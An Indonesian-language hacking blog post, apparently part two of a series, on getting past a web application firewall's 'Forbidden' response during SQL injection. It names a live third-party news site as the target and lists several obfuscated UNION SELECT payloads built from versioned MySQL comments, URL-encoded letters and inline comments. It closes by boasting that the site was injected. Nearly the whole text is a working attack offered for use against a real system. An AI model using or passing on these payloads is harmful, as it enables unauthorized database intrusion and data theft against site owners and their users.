SQL Injection ByPass Forbidden #2
Hai! Gw SwipeMoon
Kali ini gw bakal memberitahu cara memByPass Forbidden Pada SQL INJECTION saat melakukan union select, langsung ae :b .
Live Target :
ttp://sakinaidaman.com/berita.php?sa=berita&id=17
Di part 1 gw udah ngasih tau cara melakukan order by . Nah di artikel ini gw langsung skip ke union select aja.
Ini union select nya sampai angkat tujuh ya contoh : http://sakinaidaman.com/berita.php?sa=berita&id=17'+UNION+SELECT+1,2,3,4,5,6,7--+-
Nah kalau kita menggunakan +UNION+SELECT+ yang biasa maka web nya akan forbidden. Bagaimana cara mengatasi nya? Cukup mengganti +UNION+SELECT+ menjadi +AND+0+/*!50000UniON+SeLeCt*/+
Masih Forbidden kita coba pakai UNION SELECT yang ini +AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+
Kalo masih Forbidden kalian coba menggunakan UNION SELECT yang ini +And/**/.0union/*%26*/distinctROW+select+
Nah disitu angka togelnya ada 2,4,3 gw bakal masukin dios gw di angka 2 dan 3
Alhasil Forbidden nya ter ByPass dan Website pun ter inject :b
Sekian aja artikel dari gw
Best Regards,
SwipeMoon
ForceCyberTeam